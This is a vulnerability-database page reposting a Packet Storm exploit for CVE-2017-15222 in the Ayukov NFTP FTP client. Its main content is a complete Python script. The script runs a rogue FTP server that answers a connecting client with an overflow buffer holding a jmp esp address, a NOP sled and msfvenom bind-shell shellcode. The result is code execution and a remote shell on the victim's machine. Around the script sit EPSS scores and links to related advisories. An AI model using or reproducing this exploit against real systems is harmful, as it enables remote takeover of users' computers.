Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormUday MittalPACKETSTORM:150997
HistoryJan 02, 2019 - 12:00 a.m.

Ayukov NFTP FTP Client 2.0 Buffer Overflow

2019-01-0200:00:00
Uday Mittal
packetstormsecurity.com
30

0.589 Medium

EPSS

Percentile

97.8%

JSON
`# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow  
# Date: 2018-12-29  
# Exploit Author: Uday Mittal  
# Vendor Homepage: http://www.ayukov.com/nftp/  
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip   
# Version : below 2.0  
# Tested on: Microsoft Windows XP SP3  
# CVE: CVE-2017-15222  
  
# EIP Location: 4116  
# Buffer starts from : 4121  
# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)  
# badchars: '\x00\x0A\x0D\x40'  
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python  
  
import socket  
  
IP = '192.168.43.28'  
port = 21  
  
buf = ""  
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29"  
buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e"  
buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15"  
buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f"  
buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f"  
buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad"  
buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64"  
buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61"  
buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c"  
buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9"  
buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9"  
buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9"  
buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1"  
buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7"  
buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f"  
buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89"  
buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05"  
buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe"  
buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba"  
buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15"  
buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3"  
buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32"  
buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4"  
buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b"  
buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7"  
buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72"  
buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd"  
buf += "\xa4\x03\x5f\xc4"  
  
evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 + buf + "D"*10425  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.bind((IP, port))  
s.listen(20)  
print("[i] FTP Server started on port: "+str(port)+"\r\n")  
except:  
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")  
  
while True:  
conn, addr = s.accept()  
conn.send('220 Welcome!' + '\r\n')  
print conn.recv(1024)  
conn.send('331 OK.\r\n')  
print conn.recv(1024)  
conn.send('230 OK.\r\n')  
print conn.recv(1024)  
conn.send(evil + '\r\n')  
print conn.recv(1024)  
conn.send('257' + '\r\n')  
  
  
`

Related

exploitpack 2
packetstorm 3
exploitdb 3
prion 1
nvd 1
zdt 4
attackerkb 1
checkpoint_advisories 1
cvelist 1
cve 1
exploitpack
exploitpack
Ayukov NFTP FTP Client 2.0 - Remote Buffer Overflow
2017-10-21 00:00:00
Ayukov NFTP client 1.71 - SYST Buffer Overflow
2019-11-04 00:00:00
packetstorm
packetstorm
Ayukov NFTP FTP Client Buffer Overflow
2017-10-25 00:00:00
Ayukov NFTP FTP Client Buffer Overflow
2018-01-05 00:00:00
Ayukov NFTP 1.71 Buffer Overflow
2019-11-04 00:00:00
exploitdb
exploitdb
Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow
2019-11-04 00:00:00
Ayukov NFTP FTP Client 2.0 - Buffer Overflow
2019-01-02 00:00:00
Ayukov NFTP FTP Client < 2.0 - Remote Buffer Overflow
2017-10-21 00:00:00
prion
prion
Buffer overflow
2017-10-24 17:29:00
nvd
nvd
CVE-2017-15222
2017-10-24 17:29:00
zdt
zdt
Ayukov NFTP FTP Client 2.0 - Buffer Overflow Exploit
2018-01-07 00:00:00
Ayukov NFTP FTP Client < 2.0 - Buffer Overflow Exploit
2017-10-23 00:00:00
Ayukov NFTP FTP Client 2.0 - Buffer Overflow Exploit
2019-01-02 00:00:00
attackerkb
attackerkb
Ayukov NFTP FTP Client Stack Buffer Overflow Analysis
2017-10-24 00:00:00
checkpoint_advisories
checkpoint_advisories
Ayukov NFTPD Buffer Overflow Remote Code Execution (CVE-2017-15222)
2020-04-07 00:00:00
cvelist
cvelist
CVE-2017-15222
2017-10-24 17:00:00
cve
cve
CVE-2017-15222
2017-10-24 17:29:00

0.589 Medium

EPSS

Percentile

97.8%

JSON
Related for PACKETSTORM:150997
exploitpack2packetstorm3exploitdb3prion1nvd1zdt4attackerkb1checkpoint_advisories1cvelist1cve1